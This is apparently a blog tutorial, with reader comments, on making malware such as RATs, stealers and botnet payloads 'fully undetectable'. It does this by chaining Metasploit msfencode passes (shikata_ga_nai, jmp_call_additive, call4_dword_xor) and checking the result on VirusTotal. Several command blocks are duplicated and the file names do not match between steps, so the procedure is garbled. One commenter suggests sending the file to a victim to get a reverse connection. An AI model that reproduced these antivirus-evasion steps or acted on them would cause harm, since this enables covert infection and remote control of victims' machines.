Requirements:-
1. Backtrack Operating System
2. MSF encoders
2. MSF encoders
So, our first step is to create a virus file with any of the tools like RAT, stealers, botnets, payload or anything. To make it FUD (Fully Undetectable), we use backtrack. Before going to FUD check your file with ant viruses at virustotal.com and we get a detection ratio for example lets say 30/44
Now start terminal in Backtrack and navigate to the directory where your file is located.
E.g. cd Desktop
So our first step is to change the permissions of that file (775) by typing this command
root@bt:~/Desktop# chmod 775 stub.exe
Further type this command to encode your virus,
root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o
/root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10
/root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10
You’ll notice Antivirus still detected it even though we encoded it 10 times with
“x86/shikata_ga_nai” encoder.
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server2.exe
Now 2nd time, we use another encoder named as “jmp_call_additive”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o
/root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1
/root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server3.exe
root@bt:~/Desktop# chmod 775 server3.exe
Now again we use another encoder named as “call4_dword_xor”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o
/root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o
/root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server4.exe
root@bt:~/Desktop# chmod 775 server4.exe
Now final we encode again with this encoder “shikata_ga_nai”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o
/root/Desktop/final.exe -e x86/shikata_ga_nai -c 1
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o
/root/Desktop/final.exe -e x86/shikata_ga_nai -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 final.exe
root@bt:~/Desktop# chmod 775 final.exe
Now you'll get a final.exe, upload it to virustotal.com and you’ll see the results.
11 comments
Click here for commentsBut then when I try to open it on windows it says that the version of this file is not compatible with the version of windows you're running. Check your computers system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.
ReplyIt wont open cause its a encoded file in backtrack just send it to any other victim or try on your cm machine it will give a reverse connection in metasploit or i suggest you might you did anything wrong during this process :)
ReplyIs fud becouse is file raw and not ork is normally lol he don t have create exe at end lol
ReplyR.I.P English -_- first of all its about to create stub FUD not a exe file .
ReplyYou deleted my comment even tho I stuck up for you wow thanks....hope to see you soon
ReplyDont post backlinks over here . Use ur SEO techs somwhere else not on this blog. Leave a comment here or any query without any refer or back links. Hope you get it.
ReplyAfter i type this command (msfencode -i /root/Desktop/RAT.exe -t raw -o
Reply/root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10)
It just stops there
use msfvenom or watch my latest video which is related to msfvenom...
ReplyThanks
ConversionConversion EmoticonEmoticon